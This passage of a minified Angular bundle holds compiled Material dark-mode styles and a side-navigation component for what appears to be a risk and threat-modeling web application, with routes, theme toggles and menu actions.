.mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#e1bee74d}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#ffcdd24d}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]{background:#212121;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-toolbar.mat-primary[_ngcontent-%COMP%]{background:#2196f3;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-toolbar.mat-accent[_ngcontent-%COMP%]{background:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-toolbar.mat-warn[_ngcontent-%COMP%]{background:#f44336;color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-form-field-underline[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-focused[_ngcontent-%COMP%]   .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:currentColor}.darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-focused[_ngcontent-%COMP%]   .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-select-value[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-form-field.mat-focused[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:inherit}.darkMode[_ngcontent-%COMP%]   .mat-toolbar[_ngcontent-%COMP%]   .mat-input-element[_ngcontent-%COMP%]{caret-color:currentColor}.darkMode[_ngcontent-%COMP%]   .mat-tooltip[_ngcontent-%COMP%]{background:rgba(97,97,97,.9)}.darkMode[_ngcontent-%COMP%]   .mat-tree[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%]   .mat-tree-node[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%]   .mat-nested-tree-node[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%]   .mat-snack-bar-container[_ngcontent-%COMP%]{color:#000000de;background:#fafafa;box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.darkMode[_ngcontent-%COMP%]   .mat-simple-snackbar-action[_ngcontent-%COMP%]{color:inherit}html[_ngcontent-%COMP%], body[_ngcontent-%COMP%]{margin:0;padding:0;height:100%;font-family:Arial,Helvetica,sans-serif}.website-container[_ngcontent-%COMP%]{height:100%;display:flex;flex-direction:column}.drawer-container[_ngcontent-%COMP%]{width:100%;height:100%;background-color:#0000;margin-bottom:21px}.messages-info[_ngcontent-%COMP%]{color:#fff;font-weight:700}.messages-success[_ngcontent-%COMP%]{background-color:#35d10de6!important;color:#fff;font-weight:700}.messages-warning[_ngcontent-%COMP%]{background-color:#eeca00e6!important;color:#fff;font-weight:700}.messages-error[_ngcontent-%COMP%]{background-color:#ca1c1ce6!important;color:#fff;font-weight:700}.buttonAsText[_ngcontent-%COMP%]{background:none;border:none;margin:0 0 5px;padding:0;cursor:pointer;font-size:large}.mat-tab-body-wrapper[_ngcontent-%COMP%]{height:100%}.mat-tooltip[_ngcontent-%COMP%]{font-size:small!important;background-color:gray!important}.expansion-panel-headers-align[_ngcontent-%COMP%]   .mat-expansion-panel-header-title[_ngcontent-%COMP%], .expansion-panel-headers-align[_ngcontent-%COMP%]   .mat-expansion-panel-header-description[_ngcontent-%COMP%]{flex-basis:0}.expansion-panel-headers-align[_ngcontent-%COMP%]   .mat-expansion-panel-header-description[_ngcontent-%COMP%]{justify-content:space-between;align-items:center}.mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-flex[_ngcontent-%COMP%]{padding:.5em .5em 0!important}.mat-form-field-appearance-fill[_ngcontent-%COMP%]   .mat-form-field-infix[_ngcontent-%COMP%]{padding:.25em 0 .5em!important}.mat-form-field-wrapper[_ngcontent-%COMP%]{padding-bottom:10px!important}.mat-form-field-underline[_ngcontent-%COMP%]{bottom:10px!important}.mat-menu-panel[_ngcontent-%COMP%]{min-height:35px!important}  .mat-menu-content{padding-top:0!important;padding-bottom:0!important}.mat-menu-item[_ngcontent-%COMP%], .mat-option[_ngcontent-%COMP%]{line-height:35px!important;height:35px!important}.status-bar[_ngcontent-%COMP%]{position:fixed;width:100%;bottom:0;left:0;height:22px;font-size:smaller;color:#fff;border-top-style:solid;border-color:#fff;border-width:0px;z-index:99999}button[_ngcontent-%COMP%]{height:22px!important;border-radius:2px;bottom:1px}.statusBtn[_ngcontent-%COMP%]{width:auto;font-size:14px!important;line-height:22px!important}.statusBtn[_ngcontent-%COMP%]:hover{background-color:#ffffff26!important}.iconBtn[_ngcontent-%COMP%]{height:22px!important;line-height:22px!important;transform:scale(.68)}.buttonAsText[_ngcontent-%COMP%]{background:none;border:none;margin:0 0 5px;padding:0;cursor:pointer;font-size:small;color:#fff}']}),t})();function act(t,a){if(1&t){const e=Ye();m(0,"button",17),he("click",function(){return be(e),Me(B().OpenGitHubUrl())}),s(1,"\n          "),it(2,"fa-icon",24),s(3,"\n          "),m(4,"span"),s(5),u(),s(6,"\n        "),u()}if(2&t){const e=B();C(2),V("icon",e.faCodeBranch),C(3),ct("",e.dataService.UserAccount," (GitHub)")}}function nct(t,a){if(1&t){const e=Ye();m(0,"button",17),he("click",function(){return be(e),Me(B().theme.SetDarkMode(!1))}),s(1,"\n          "),m(2,"mat-icon"),s(3,"brightness_5"),u(),s(4,"\n          "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n        "),u()}2&t&&(C(6),ke(re(7,1,"side-nav.lightMode")))}function oct(t,a){if(1&t){const e=Ye();m(0,"button",17),he("click",function(){return be(e),Me(B().theme.SetDarkMode(!0))}),s(1,"\n          "),m(2,"mat-icon"),s(3,"bedtime"),u(),s(4,"\n          "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n        "),u()}2&t&&(C(6),ke(re(7,1,"side-nav.darkMode")))}let gf=(()=>{class t{constructor(e,i,n,r,c,d,T){this.theme=e,this.localization=i,this.locStorage=n,this.dataService=r,this.messagesService=c,this.router=d,this.dialog=T,this.selectedRoute="",this.sameRoute=new Tt,this.faCodeBranch=Z5}ngAfterViewInit(){this.setSelectedClass(this.theme.IsDarkMode),this.theme.ThemeChanged.subscribe(e=>this.setSelectedClass(e))}IsSelected(e,i=!1){return e==this.selectedRoute&&this.theme.IsDarkMode==i}IsHoveredOrSelected(e,i=!1){return this.IsSelected(e,i)||e==this.hovered&&this.theme.IsDarkMode==i}ChangeLanguage(e){this.localization.Locale=e}Clear(){let e=()=>{this.locStorage.Clear(),window.location.reload()};this.dataService.HasUnsavedChanges?this.dialog.OpenUnsavedChangesDialog().subscribe(i=>{i?this.dataService.OnSave().then(()=>e()):e()}):e()}ResetLayout(){let e=()=>{this.locStorage.ResetLayout(),window.location.reload()};this.dataService.HasUnsavedChanges?this.dialog.OpenUnsavedChangesDialog().subscribe(i=>{i?this.dataService.OnSave().then(()=>e()):e()}):e()}OpenCookieConsent(){this.dialog.OpenCookieConsentDialog()}OpenGitHubUrl(){window.open(this.dataService.UserURL,"_blank")}OpenYouTubePlaylist(){window.open("https://www.youtube.com/playlist?list=PLSMRtuVN409fB35RLljjg3jNkVJbLIP1u","_blank")}OpenGlossary(){this.dialog.OpenGlossaryDialog()}OnMouseEnter(e){this.hovered=e}OnMouseLeave(){this.hovered=""}OnClick(e){e==this.router.url?this.sameRoute.emit():this.router.navigate([e])}setSelectedClass(e){if(""!=this.selectedRoute){let i=document.getElementsByClassName("sidenav-icon-button");for(let n=0;n<i.length;n++)i[n].classList.remove("btn-selected-dark"),i[n].classList.remove("btn-selected-light"),i[n].name&&i[n].name.endsWith(this.selectedRoute)&&i[n].classList.add(e?"btn-selected-dark":"btn-selected-light")}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(yT),Ee(_r),Ee(Yi),Ee(A2),Ee(Oo),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-side-nav"]],inputs:{selectedRoute:"selectedRoute"},outputs:{sameRoute:"sameRoute"},decls:262,vars:191,consts:[[2,"height","100%"],["name","/home","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],["mat-icon-button",""],["name","/dashboard","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],["name","/modeling","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],["name","/risk","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],["name","/mitigation","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],["name","/reporting","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],["name","/configuration","routerLink","/configuration","matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","click","mouseenter","mouseleave"],[2,"position","absolute","bottom","0px"],["matTooltipPosition","right",1,"sidenav-icon-button",3,"matTooltip","mouseenter","mouseleave"],["mat-icon-button","",3,"matMenuTriggerFor"],["tourAnchor","change-settings"],["color","primary"],["menu","matMenu"],["mat-menu-item","","routerLink","/login"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"click",4,"ngIf"],["mat-menu-item","",3,"matMenuTriggerFor"],["languages","matMenu"],["mat-menu-item",""],["color","primary",3,"ngModel","ngModelChange","click"],["messages","matMenu"],[2,"margin-left","7px","margin-right","23px",3,"icon"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div"),s(3,"\n    "),m(4,"button",1),he("click",function(){return i.OnClick("/home")})("mouseenter",function(){return i.OnMouseEnter("/home")})("mouseleave",function(){return i.OnMouseLeave()}),oe(5,"translate"),s(6,"\n      "),m(7,"button",2),s(8,"\n        "),m(9,"mat-icon"),s(10,"home"),u(),s(11,"\n      "),u(),s(12,"\n    "),u(),s(13,"\n  "),u(),s(14,"\n  "),m(15,"div"),s(16,"\n    "),m(17,"button",3),he("click",function(){return i.OnClick("/dashboard")})("mouseenter",function(){return i.OnMouseEnter("/dashboard")})("mouseleave",function(){return i.OnMouseLeave()}),oe(18,"translate"),s(19,"\n      "),m(20,"button",2),s(21,"\n        "),m(22,"mat-icon"),s(23,"assessment"),u(),s(24," \n      "),u(),s(25,"\n    "),u(),s(26,"\n  "),u(),s(27,"\n  "),m(28,"div"),s(29,"\n    "),m(30,"button",4),he("click",function(){return i.OnClick("/modeling")})("mouseenter",function(){return i.OnMouseEnter("/modeling")})("mouseleave",function(){return i.OnMouseLeave()}),oe(31,"translate"),s(32,"\n      "),m(33,"button",2),s(34,"\n        "),m(35,"mat-icon"),s(36,"architecture"),u(),s(37," \n      "),u(),s(38,"\n    "),u(),s(39,"\n  "),u(),s(40,"\n  "),m(41,"div"),s(42,"\n    "),m(43,"button",5),he("click",function(){return i.OnClick("/risk")})("mouseenter",function(){return i.OnMouseEnter("/risk")})("mouseleave",function(){return i.OnMouseLeave()}),oe(44,"translate"),s(45,"\n      "),m(46,"button",2),s(47,"\n        "),m(48,"mat-icon"),s(49,"crisis_alert"),u(),s(50," \n      "),u(),s(51,"\n    "),u(),s(52,"\n  "),u(),s(53,"\n  "),m(54,"div"),s(55,"\n    "),m(56,"button",6),he("click",function(){return i.OnClick("/mitigation")})("mouseenter",function(){return i.OnMouseEnter("/mitigation")})("mouseleave",function(){return i.OnMouseLeave()}),oe(57,"translate"),s(58,"\n      "),m(59,"button",2),s(60,"\n        "),m(61,"mat-icon"),s(62,"security"),u(),s(63," \n      "),u(),s(64,"\n    "),u(),s(65,"\n  "),u(),s(66,"\n  "),m(67,"div"),s(68,"\n    